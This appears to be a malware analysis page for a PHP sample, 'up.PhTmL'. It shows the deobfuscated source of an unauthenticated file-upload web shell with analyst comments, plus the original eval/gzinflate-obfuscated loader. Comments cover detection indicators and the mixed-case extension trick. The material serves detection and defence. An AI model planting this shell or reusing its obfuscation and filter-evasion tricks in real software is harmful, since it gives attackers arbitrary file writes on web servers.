PHP Malware Analysis


Filename: up.PhTmL

Tags

Input
  • _POST
  • _FILES
Environment
  • php_uname
Files
  • copy

Deobfuscated code

<?php

// Decoded payload of the sample: an unauthenticated file-upload web shell.
// Anyone who can request this script can write a file of their choosing under
// the web root (or, failing that, next to the script).
// Strings visible here that can serve as detection indicators once the sample
// is decoded: the banner text, the form field name `idx_file`, and the
// Indonesian status messages.
// NOTE(review): `eval /* ... */ { ... }` looks like the deobfuscator's notation
// for "code that was passed to eval()"; it is not runnable PHP syntax as printed.
eval /* PHPDeobfuscator eval output */ {
    // Banner identifying the tool; printed on every request.
    echo "Priv8 Home Root Uploader by LCR999X - Security Cyber Art<br>";
    // Discloses the host's OS/kernel description to any visitor.
    echo "<b>" . php_uname() . "</b><br>";
    // Upload form with no `action`, so it posts back to this same URL.
    // Field names: `idx_file` (the file) and `upload` (the submit button).
    echo "<form method='post' enctype='multipart/form-data'>\n\t  <input type='file' name='idx_file'>\n\t  <input type='submit' name='upload' value='upload'>\n\t  </form>";
    $root = $_SERVER['DOCUMENT_ROOT'];
    // Client-supplied file name, read before the isset() check below, so a plain
    // GET reaches this line with no upload present.
    // NOTE(review): that should raise a PHP notice/warning, which may show up in
    // error logs depending on PHP version and logging configuration.
    $files = $_FILES['idx_file']['name'];
    // Destination is built from the client-supplied name as-is: no basename(),
    // no extension allow-list, no content check.
    $dest = $root . '/' . $files;
    // The only gate is the presence of the `upload` POST field; there is no
    // password, token or session check anywhere in this block.
    if (isset($_POST['upload'])) {
        if (is_writable($root)) {
            // copy() is used rather than move_uploaded_file(), and `@` hides the
            // warning on failure, so a failed write leaves no PHP warning behind.
            if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
                // Link is assembled from the request's Host header and the
                // client file name and echoed without HTML escaping.
                $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
                // Message is Indonesian, roughly "upload successful".
                echo "uploadnya sukses beb :* -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
            } else {
                // Indonesian: "failed to upload to root".
                echo "gagal upload root >:(";
            }
        } else {
            // Fallback when the document root is not writable: the destination is
            // the bare client file name, i.e. a relative path.
            // NOTE(review): presumably resolves to the script's own directory
            // (the success message says "in this folder") -- confirm against
            // the server's working directory.
            if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
                echo "uploadnya sukses beb :* <b>{$files}</b> di folder ini";
            } else {
                // Indonesian: "upload failed".
                echo "gagal upload >:(";
            }
        }
    }
};


Original code

<?php eval("?>".gzinflate("\x95\x92\xdd\x8a\xdb\x30\x10\x85\xaf\xe3\xa7\x18\x4c\x40\x4e\x69\xec\xdb\x26\x6b\x6b\x5b\xd2\x94\x14\xb6\x4d\x70\xbc\xa5\x10\x82\x91\x62\x39\x11\x6b\x5b\xc2\x96\x77\xd7\x94\x7d\xf7\xea\x67\x43\x52\x5a\x4a\x7b\x29\xe6\x9b\x39\xe7\xcc\x28\xbe\x95\x27\xe9\xb1\xc3\x49\x80\xbf\x69\xf9\xe3\x3b\x58\x89\x9a\x41\x2a\x84\x82\x7b\x59\x09\x52\xb0\x16\xe8\x00\x77\x8b\x74\x36\x9b\x7d\x87\x29\x6c\xd9\xa1\x6f\xb9\x1a\x60\x31\x50\x5d\xfb\xd0\xaa\x98\xb6\xd8\xbf\x79\x1d\x12\x53\xec\x87\x7a\x66\xde\x37\xa4\x66\xc1\x24\xf4\xe3\x88\xe2\x5f\x91\x52\xb4\x35\xd4\x4c\x9d\x44\x91\x20\x29\x3a\x85\x80\x35\x07\x35\x48\x96\xa0\xba\xaf\x14\x97\xa4\x55\x91\xa1\xa6\x05\x51\x04\x61\x6f\x04\x10\xf3\x46\xf6\x0a\x1c\x55\xf2\x8a\x21\x30\x0a\x09\xe2\xc5\x73\x6e\xdf\xbf\x63\x5d\x4f\x6b\xae\xce\x60\x6f\xf3\x20\x78\x24\x55\x7f\x79\xba\x2e\xab\x66\x2c\x8e\x5b\x13\x3d\x81\x71\xbe\x5d\xa6\xdf\x96\xe9\x0e\x7d\x5c\x2f\xee\xbf\x2c\xbf\x66\x79\xba\x5e\x67\x68\xaf\x11\xa3\xd6\x59\xe6\xd3\xe7\xbb\xe5\x76\x77\xb1\xb0\xdf\x21\xa3\x65\xa9\x82\x75\x76\x90\x19\x18\xa2\x08\x85\xae\xef\xc6\xe3\x65\xc0\xbb\x8e\xa9\x60\x9c\x6f\xd6\xdb\x6c\x77\x76\xb2\x9f\x4c\xe0\x87\x37\xb2\xe5\xfc\x49\xef\x98\xd0\x8a\x05\xb6\xdf\x55\x4c\xe9\xfd\x41\xc8\x21\xf8\xa3\xb2\xaa\x65\xee\xd4\xdf\x82\x55\x7f\xed\x1a\x8d\x9f\x18\xd5\x4e\xfc\x93\x52\x72\x1e\x45\x7e\x78\x09\xb7\xca\xb2\x4d\xbe\xd2\x2e\xd0\x3e\xf4\x23\x9d\x5f\xe3\xee\x4a\xce\x54\x33\x10\xe8\xfa\x87\x4e\xe7\xa5\x7a\xc8\xfc\x0d\x4c\x31\xc4\x04\x4e\x2d\x2b\x13\x64\x06\x47\x2e\x16\x02\x45\xda\x23\x53\x09\xca\x69\x45\x9a\x07\xa4\x6f\x8e\xe3\x1e\x5f\x21\x71\xd4\x63\xfb\x19\x22\x82\xad\xd2\x0b\xb0\xaa\x63\xce\xa3\x13\x3d\x92\x23\xa9\xc0\x49\x83\xbd\x04\x9e\x07\x8e\xf5\xae\xf1\xff\x58\x84\x95\x3e\x6f\xe2\xef\xd1\xb4\xe3\xb3\x53\x8a\xa1\xe0\x50\x8a\xca\xfc\x7f\xde\xf0\x7f\xf1\x7b\x6d\xd5\x7b\xf1\x6e\xf1\x4f"));
// The sample as found on disk: a single statement that inflates a raw-DEFLATE
// blob (written as \xNN escapes inside a double-quoted string) and hands the
// result to eval(). The leading "?>" switches the evaluated text out of PHP
// mode, so the inflated payload is parsed like a normal PHP file.
// None of the payload's readable strings (banner, field names, messages) exist
// in this file before inflation, so content signatures written against the
// decoded text will not match it; scanners have to key on the wrapper shape,
// eval("?>".gzinflate("...")) with a long escaped literal, or decode first.
// NOTE(review): the page gives the file name as up.PhTmL; the mixed-case
// extension is presumably meant to slip past case-sensitive extension filters,
// so upload and handler rules should compare extensions case-insensitively.